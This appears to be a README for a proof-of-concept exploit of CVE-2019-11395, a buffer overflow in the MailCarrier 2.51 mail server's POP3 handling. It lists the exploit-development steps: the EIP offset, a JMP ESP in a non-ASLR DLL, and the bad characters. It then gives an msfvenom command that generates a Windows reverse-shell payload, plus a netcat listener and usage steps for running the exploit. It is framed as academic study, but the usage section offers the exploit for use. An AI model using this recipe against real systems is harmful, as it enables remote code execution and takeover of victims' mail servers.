CVE-2019-11395 Exploit 🛡️

About CVE-2019-11395 🕵️

The CVE-2019-11395 vulnerability describes a buffer overflow vulnerability in the MailCarrier 2.51 email application, allowing remote code execution. The vulnerability occurs in SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, or POP3 RETR processes.

During academic study, focus was placed on the POP3 processes to create a Proof of Concept (PoC). It was identified that sending 6000 bytes to the application causes it to stop functioning, thus revealing the buffer overflow vulnerability.

Exploitation Steps 🔍

1. Utilized msf-pattern_create -l 6000 to accurately identify the EIP.
2. Identified the EIP offset with msf-pattern_offset -q 6E47386E -l 6000, resulting in an EIP offset of 5095.
3. Identified expsrv.dll with ASLR disabled, suitable for a JMP ESP.
4. Identified bad characters \x00\x0a\x0d during tests for invalid characters.
5. Generated payload with msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.
6. Adjusted the CVE-2019-11395.py code to accommodate the payload.
7. Opened connection with nc -lnvp 4444 and executed the exploit (CVE-2019-11395.py) to gain access to the environment and validate the described CVE.

Usage 🚀

Follow these steps to utilize the exploit:

1. Generate the payload using msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.
2. Copy the output of the msfvenom command.
3. Adjust the CVE-2019-11395.py code to replace the shellcode variable with the output obtained from the msfvenom command.
4. Execute the exploit (CVE-2019-11395.py) to gain access to the environment and validate the described CVE.

Compromised Environment 📸

🔗 Connect with me

Visit my profile on LinkedIn